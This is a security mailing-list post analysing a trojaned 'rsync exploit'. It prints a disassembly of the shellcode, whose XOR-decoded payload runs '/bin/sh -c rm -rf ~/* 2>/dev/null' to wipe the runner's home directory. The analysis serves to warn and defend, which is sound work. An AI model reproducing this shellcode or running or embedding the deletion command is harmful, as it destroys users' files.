[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <40B7D37A.8050508@thievco.com>
From: BlueBoar at thievco.com (Blue Boar)
Subject: new rsync :) exploit rsync-too-open
dkey wrote:
> "nice mail"...but if somebody wants to use it, check the shellcode first...i
> think it deletes all your files in your home dir. i'm not sure, maybe
> somebody else can check it...
Yes.
seg000:00000000 ; Segment type: Pure code
seg000:00000000 seg000 segment byte public 'CODE' use32
seg000:00000000 assume cs:seg000
seg000:00000000 assume es:nothing, ss:nothing,
ds:nothing, fs:nothing, gs:nothing
seg000:00000000 jmp short loc_12
seg000:00000002
seg000:00000002 ; ??????????????? S U B R O U T I N E
???????????????????????????????????????
seg000:00000002
seg000:00000002
seg000:00000002 sub_2 proc near ; CODE XREF:
sub_2+10.p
seg000:00000002 pop esi ; ESI = addr of decode section
seg000:00000003 xor ecx, ecx ; ECX = 0
seg000:00000005 mov cl, 75 ; loop 75 times
seg000:00000007 mov al, 255 ; XOR value start
seg000:00000009
seg000:00000009 decode_loop: ; CODE XREF:
sub_2+C.j
seg000:00000009 xor [esi], al ; XOR current
byte in decode section with AL
seg000:0000000B dec al ; AL = AL - 1
seg000:0000000D inc esi ; next byte
seg000:0000000E loop decode_loop
seg000:00000010 jmp short decoded
seg000:00000012 ;
---------------------------------------------------------------------------
seg000:00000012
seg000:00000012 loc_12: ; CODE XREF: seg000:00000000.j
seg000:00000012 call sub_2 ; push addr of decode section
seg000:00000017
seg000:00000017 decoded: ; CODE XREF: sub_2+E.j
seg000:00000017 call loc_41 ; push addr of "\bin\sh"
seg000:00000017 ;
---------------------------------------------------------------------------
seg000:0000001C aBinSh db '/bin/sh',0
seg000:00000024 aSh db 'sh',0
seg000:00000027 aC db '-c',0
seg000:0000002A aRmRf2DevNull db 'rm -rf ~/* 2>/dev/null',0
seg000:00000041 ;
---------------------------------------------------------------------------
seg000:00000041
seg000:00000041 loc_41: ; CODE XREF: sub_2+15.p
seg000:00000041 pop ebp ; EBP = addr of "\bin\sh"
seg000:00000042 xor eax, eax ; EAX = 0
seg000:00000042 sub_2 endp
seg000:00000042
seg000:00000044 push eax ; 0
seg000:00000045 lea ebx, [ebp+0Eh]
seg000:00000048 push ebx ; "'rm -rf ~/* 2>/dev/null"
seg000:00000049 lea ebx, [ebp+0Bh]
seg000:0000004C push ebx ; "-c"
seg000:0000004D lea ebx, [ebp+8]
seg000:00000050 push ebx ; "sh"
seg000:00000051 mov ebx, ebp ; "/bin/sh"
seg000:00000053 mov ecx, esp
seg000:00000055 xor edx, edx ; EDX = 0
seg000:00000057 mov al, 0Bh
seg000:00000059 int 80h ; LINUX - sys_execve
seg000:0000005B mov ebx, eax ; EBX = result
seg000:0000005D xor eax, eax
seg000:0000005F inc eax ; exit (1)
seg000:00000060 int 80h ; LINUX - sys_exit
seg000:00000060 seg000 ends
seg000:00000060 end
AKA "/bin/sh -c rm -rf ~/* 2>/dev/null"
BB
Powered by blists - more mailing lists